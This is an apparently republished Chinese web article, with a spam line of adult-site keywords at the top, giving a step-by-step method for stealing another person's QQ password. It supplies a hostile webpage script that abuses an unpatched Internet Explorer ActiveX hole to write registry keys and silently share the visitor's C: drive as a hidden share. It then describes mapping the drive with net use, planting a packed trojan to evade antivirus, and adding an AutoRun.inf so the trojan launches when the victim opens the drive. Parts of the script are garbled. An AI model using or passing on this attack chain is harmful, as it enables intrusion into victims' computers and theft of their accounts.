中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

黑客通過(guò)網(wǎng)頁(yè)竊取QQ方法解析

2017-11-30    來(lái)源:

容器云強(qiáng)勢(shì)上線!快速搭建集群,上萬(wàn)Linux鏡像隨意使用

  要想偷別人的QQ,方法有很多了。利用惡意網(wǎng)頁(yè)使對(duì)方的電腦被共享出來(lái)是很有趣的一招。方法是:在你的網(wǎng)站網(wǎng)頁(yè)中加入如下內(nèi)容的代碼:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

  上面的代碼大家一定很容易讀懂,簡(jiǎn)單說(shuō)來(lái)就是通過(guò)修改對(duì)方注冊(cè)表中的鍵值,把對(duì)方的C盤(pán)共享出來(lái),如果想讓對(duì)方的其他盤(pán)都共享請(qǐng)自行設(shè)置。

  述代碼中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外殼對(duì)象。WSH是微軟提供的一種基于32位Windows平臺(tái)的、與語(yǔ)言無(wú)關(guān)的腳本解釋機(jī)制,它使得腳本能夠直接在Windows桌面或命令提示符下運(yùn)行。WSH使得腳本可以被執(zhí)行,就象執(zhí)行批處理一樣。以“Shl.RegWrite”開(kāi)頭的這幾句代碼的作用是寫(xiě)入瀏覽者的注冊(cè)表,就是它們使得對(duì)方的硬盤(pán)被共享的。把“Flags”的鍵值設(shè)為00000302可以隱藏共享,使對(duì)方無(wú)法發(fā)現(xiàn),非常隱蔽。

  網(wǎng)頁(yè)做好后,把它上傳你的主頁(yè)空間,騙他瀏覽你的網(wǎng)頁(yè)(就看你的嘴皮子功夫了),如果對(duì)方的IE沒(méi)有打補(bǔ)。ňW(wǎng)上這樣的電腦有很多),就可以把他的C盤(pán)共享出來(lái)。整個(gè)方法的原理就是把com.ms.activeX.ActiveXComponent對(duì)象嵌入<APPLET>標(biāo)記中,這樣會(huì)導(dǎo)致任意創(chuàng)建和解釋執(zhí)行ActiveX對(duì)象,使我們可以創(chuàng)建任意文件、運(yùn)行程序、寫(xiě)注冊(cè)表。未打補(bǔ)丁的IE,在打開(kāi)含有上述代碼的網(wǎng)頁(yè)時(shí)不會(huì)有任何警告,我們就是利用這個(gè)漏洞把對(duì)方的硬盤(pán)被共享出來(lái)。

  等對(duì)方中招后,就把對(duì)方的硬盤(pán)映射過(guò)來(lái),可以使用net use命令,也可以使用網(wǎng)絡(luò)刺客II等軟件。下一步可以給對(duì)方植入一個(gè)盜QQ的軟件,比方說(shuō)QQ殺手等,注意一定要用ASPack或其他加殼軟件給木馬加殼(其實(shí)就是另類“壓縮”),防止殺毒軟件發(fā)現(xiàn)。

  最后,打開(kāi)記事本鍵入以下內(nèi)容:

[AutoRun]
open=winnt32.exe

  保存為AutoRun.inf,其中的winnt32.exe為木馬文件。把AutoRun.inf和winnt32.exe一起拷到對(duì)方某分區(qū)的根目錄下。這樣,只要他雙擊該分區(qū)就會(huì)中木馬!這樣可以大大的增加木馬運(yùn)行的主動(dòng)性!須知許多人現(xiàn)在都非常警惕,不熟悉的文件他們輕易的不會(huì)運(yùn)行,而這種方法就很難防范了。

  以后,你就等著用郵箱收信收對(duì)方的QQ密碼吧。

標(biāo)簽: 代碼 腳本 漏洞 網(wǎng)絡(luò)

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請(qǐng)聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請(qǐng)與原作者聯(lián)系。

上一篇:企業(yè)如何應(yīng)對(duì)高級(jí)閃避技術(shù)帶來(lái)的新威脅

下一篇:ntfs.dll病毒ntfs.dll木馬清除辦法